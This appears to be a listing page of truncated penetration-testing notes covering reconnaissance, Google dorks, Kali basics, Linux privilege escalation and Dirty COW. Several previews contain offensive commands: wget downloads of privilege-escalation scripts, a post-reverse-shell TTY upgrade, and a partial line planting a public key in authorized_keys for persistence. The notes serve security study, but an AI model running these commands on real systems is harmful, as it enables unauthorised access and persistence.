Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Title: Active Information Gathering required in Penetration Testing
By: ajayverma 2019-05-16 16:22:36

Port Scanning
Subnet Reference Table
/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 51...

Score: 0

View details
Title: Passive Information Gathering required in Penetration Testing
By: ajayverma 2019-05-16 16:22:39

Google Hacking

Google search to find website sub domains
site:microsoft.com

Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf

Google inurl
inurl:"level/15/sexec/-/show"

Google Hacking Database:
https://www.exploit-...

Score: 0

View details
Title: Basic of Kali Linux uses for Penetration Testing
By: ajayverma 2019-05-16 16:22:44

Set the Target IP Address to the $ip system variable
export ip=192.168.1.100

Find the location of a file
locate sbd.exe

Search through directories in the $PATH environment variable
which sbd

Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*

Show active int...

Score: 0

View details
Title: Linux Post Exploitation and Privilege escalation_3
By: ajayverma 2019-05-16 16:22:49

Scripts to run

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
wget http://www.securitysift.com/download/linuxprivchecker.py
wget https://github.com/pentestmonkey/unix-privesc-check

Other scripts:
wget https://raw...

Score: 0

View details
Title: Linux Post Exploitation and Privilege escalation_2
By: unknowndevice64 2019-10-13 15:46:56

Linux elevation of privileges, manual testing
Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.

First try simple sudo:
$ sudo su -

What can we run with sudo?
$ sudo -l

Try su as all users ...

Score: 1

View details
Title: Linux Post Exploitation and Privilege escalation_1
By: ajayverma 2019-05-16 16:22:59

Post exploitation
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:
$ echo $(wget https://A...

Score: 0

View details
Title: Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel
By: ajayverma 2019-05-16 16:23:02

Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...

Score: 0

View details